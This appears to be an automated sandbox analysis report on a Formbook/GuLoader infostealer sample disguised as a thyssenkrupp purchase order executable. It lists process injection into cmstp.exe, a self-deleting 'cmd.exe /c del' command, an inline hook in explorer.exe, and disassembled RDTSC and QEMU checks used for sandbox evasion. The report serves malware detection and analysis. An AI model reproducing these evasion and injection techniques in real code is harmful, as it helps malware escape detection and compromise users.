Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk | 1_2_1E3E9A00
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9A50 NtCreateFile,LdrInitializeThunk | 1_2_1E3E9A50
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk | 1_2_1E3E9860
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9840 NtDelayExecution,LdrInitializeThunk | 1_2_1E3E9840
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk | 1_2_1E3E98F0
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk | 1_2_1E3E9910
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E99A0 NtCreateSection,LdrInitializeThunk | 1_2_1E3E99A0
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9610 NtEnumerateValueKey | 1_2_1E3E9610
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9670 NtQueryInformationProcess | 1_2_1E3E9670
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9650 NtQueryValueKey | 1_2_1E3E9650
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E96D0 NtCreateKey | 1_2_1E3E96D0
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3E9730 NtQueryVirtualMemory | 1_2_1E3E9730
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3EA710 NtOpenProcessToken | 1_2_1E3EA710
Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3EA770 NtOpenThread | 1_2_1E3EA770
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9770 NtSetInformationFile,1_2_1E3E9770
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9760 NtOpenProcess,1_2_1E3E9760
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9FE0 NtCreateMutant,1_2_1E3E9FE0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3EAD30 NtSetContextThread,1_2_1E3EAD30
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9520 NtWaitForSingleObject,1_2_1E3E9520
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9560 NtWriteFile,1_2_1E3E9560
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E95F0 NtQueryInformationFile,1_2_1E3E95F0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9A10 NtQuerySection,1_2_1E3E9A10
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9A80 NtOpenDirectoryObject,1_2_1E3E9A80
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9B00 NtSetValueKey,1_2_1E3E9B00
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3EA3B0 NtGetContextThread,1_2_1E3EA3B0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9820 NtEnumerateKey,1_2_1E3E9820
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3EB040 NtSuspendThread,1_2_1E3EB040
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E98A0 NtWriteVirtualMemory,1_2_1E3E98A0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9950 NtQueueApcThread,1_2_1E3E9950
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E99D0 NtCreateProcessEx,1_2_1E3E99D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B395D0 NtClose,LdrInitializeThunk,6_2_04B395D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39540 NtReadFile,LdrInitializeThunk,6_2_04B39540
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04B396E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B396D0 NtCreateKey,LdrInitializeThunk,6_2_04B396D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04B39660
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39650 NtQueryValueKey,LdrInitializeThunk,6_2_04B39650
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39780 NtMapViewOfSection,LdrInitializeThunk,6_2_04B39780
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39FE0 NtCreateMutant,LdrInitializeThunk,6_2_04B39FE0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39710 NtQueryInformationToken,LdrInitializeThunk,6_2_04B39710
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04B39860
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39840 NtDelayExecution,LdrInitializeThunk,6_2_04B39840
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B399A0 NtCreateSection,LdrInitializeThunk,6_2_04B399A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04B39910
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A50 NtCreateFile,LdrInitializeThunk,6_2_04B39A50
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B395F0 NtQueryInformationFile,6_2_04B395F0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3AD30 NtSetContextThread,6_2_04B3AD30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39520 NtWaitForSingleObject,6_2_04B39520
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39560 NtWriteFile,6_2_04B39560
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39610 NtEnumerateValueKey,6_2_04B39610
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39670 NtQueryInformationProcess,6_2_04B39670
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B397A0 NtUnmapViewOfSection,6_2_04B397A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39730 NtQueryVirtualMemory,6_2_04B39730
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3A710 NtOpenProcessToken,6_2_04B3A710
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3A770 NtOpenThread,6_2_04B3A770
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39770 NtSetInformationFile,6_2_04B39770
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39760 NtOpenProcess,6_2_04B39760
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B398A0 NtWriteVirtualMemory,6_2_04B398A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B398F0 NtReadVirtualMemory,6_2_04B398F0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39820 NtEnumerateKey,6_2_04B39820
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3B040 NtSuspendThread,6_2_04B3B040
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B399D0 NtCreateProcessEx,6_2_04B399D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39950 NtQueueApcThread,6_2_04B39950
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A80 NtOpenDirectoryObject,6_2_04B39A80
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A20 NtResumeThread,6_2_04B39A20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A10 NtQuerySection,6_2_04B39A10
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A00 NtProtectVirtualMemory,6_2_04B39A00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3A3B0 NtGetContextThread,6_2_04B3A3B0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39B00 NtSetValueKey,6_2_04B39B00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979E70 NtClose,6_2_02979E70
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979F20 NtAllocateVirtualMemory,6_2_02979F20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979DF0 NtReadFile,6_2_02979DF0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979D40 NtCreateFile,6_2_02979D40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979D92 NtCreateFile,6_2_02979D92
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979DEA NtReadFile,6_2_02979DEA
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979D3B NtCreateFile,6_2_02979D3B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe Code function: String function: 1E3AB150 appears 45 times
      Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 04AFB150 appears 39 times
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000000.00000002.691920446.0000000000414000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesweepers.exe vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000000.00000002.692698776.00000000021C0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000000.684998082.0000000000414000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesweepers.exe vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.762365893.000000001E62F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.761538741.000000001DDA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757401813.00000000000D0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMSTP.EXE` vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.761594514.000000001DEF0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe Binary or memory string: OriginalFilenamesweepers.exe vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: unknown Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.922109924.0000000004FFF000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.761692759.000000001E150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.921254049.0000000002EBE000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@4/2
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe File created: C:\Users\user\AppData\Local\Temp\~DF19C1EAA8A3135A4C.TMP
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe Virustotal: Detection: 30%
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe ReversingLabs: Detection: 14%
      Source: unknown Process created: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'
      Source: unknown Process created: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'
      Source: unknown Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'
      Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe Process created: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'
      Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe'
      Source: Binary string: cmstp.pdbGCTL source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757401813.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.735175160.0000000005A00000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.761860471.000000001E380000.00000040.00000001.sdmp, cmstp.exe, 00000006.00000002.921795937.0000000004BEF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, cmstp.exe
      Source: Binary string: cmstp.pdb source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757401813.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.735175160.0000000005A00000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe PID: 6304, type: MEMORY
      Source: Yara match | File source: Process Memory Space: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe PID: 6780, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match | File source: Process Memory Space: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe PID: 6304, type: MEMORY
      Source: Yara match | File source: Process Memory Space: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe PID: 6780, type: MEMORY
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_00406655 push FFFFFFD3h; ret 0_2_0040665B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 0_2_004113EC push eax; ret 0_2_0041142B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_1E3FD0D1 push ecx; ret 1_2_1E3FD0E4
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_0008E3E6 pushad ; ret 1_2_0008E3E7
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_000B71BE push esi; ret 1_2_000B71E6
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Code function: 1_2_000AE26A pushfd ; retf 1_2_000AE27D
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_04B4D0D1 push ecx; ret 6_2_04B4D0E4
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_0296E26A pushfd ; retf 6_2_0296E27D
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_029771BE push esi; ret 6_2_029771E6
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_0297CE95 push eax; ret 6_2_0297CEE8
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_0297CEE2 push eax; ret 6_2_0297CEE8
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_0297CEEB push eax; ret 6_2_0297CF52
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_02979E3A push ss; ret 6_2_02979E3B
      Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 6_2_0297CF4C push eax; ret 6_2_0297CF52
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | File created: \purchase order updates thyssenkrupp materials australia 900-5400006911.exe

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE7
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | RDTSC instruction interceptor: First address: 00000000021F80C7 second address: 00000000021F80C7 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0468D3DF38h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dh, ch 0x00000021 cmp al, al 0x00000023 test bl, cl 0x00000025 add edi, edx 0x00000027 dec dword ptr [ebp+000000F8h] 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007F0468D3DEE5h 0x00000036 jmp 00007F0468D3DF5Eh 0x00000038 cmp dx, dx 0x0000003b call 00007F0468D3DFBEh 0x00000040 call 00007F0468D3DF4Ah 0x00000045 lfence 0x00000048 mov edx, dword ptr [7FFE0014h] 0x0000004e lfence 0x00000051 ret 0x00000052 mov esi, edx 0x00000054 pushad 0x00000055 rdtsc
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000000.00000002.692728631.00000000021F0000.00000040.00000001.sdmp, Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757436469.0000000000563000.00000040.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | RDTSC instruction interceptor: First address: 00000000021F80C7 second address: 00000000021F80C7 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F0468D3DF38h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dh, ch 0x00000021 cmp al, al 0x00000023 test bl, cl 0x00000025 add edi, edx 0x00000027 dec dword ptr [ebp+000000F8h] 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007F0468D3DEE5h 0x00000036 jmp 00007F0468D3DF5Eh 0x00000038 cmp dx, dx 0x0000003b call 00007F0468D3DFBEh 0x00000040 call 00007F0468D3DF4Ah 0x00000045 lfence 0x00000048 mov edx, dword ptr [7FFE0014h] 0x0000004e lfence 0x00000051 ret 0x00000052 mov esi, edx 0x00000054 pushad 0x00000055 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | RDTSC instruction interceptor: First address: 00000000021F8112 second address: 00000000021F8112 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0468D32A96h 0x0000001f popad 0x00000020 call 00007F0468D32516h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe | RDTSC instruction interceptor: First address: 00000000021F8C4E second address: 00000000021F8C4E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 cmp ebx, eax 0x00000006 je 00007F0468D3E1AFh 0x0000000c cmp byte ptr [ebx], FFFFFFB8h 0x0000000f jne 00007F0468D3DF1Bh 0x00000011 pushad 0x00000012 mov ebx, 00000066h 0x00000017 rdtsc
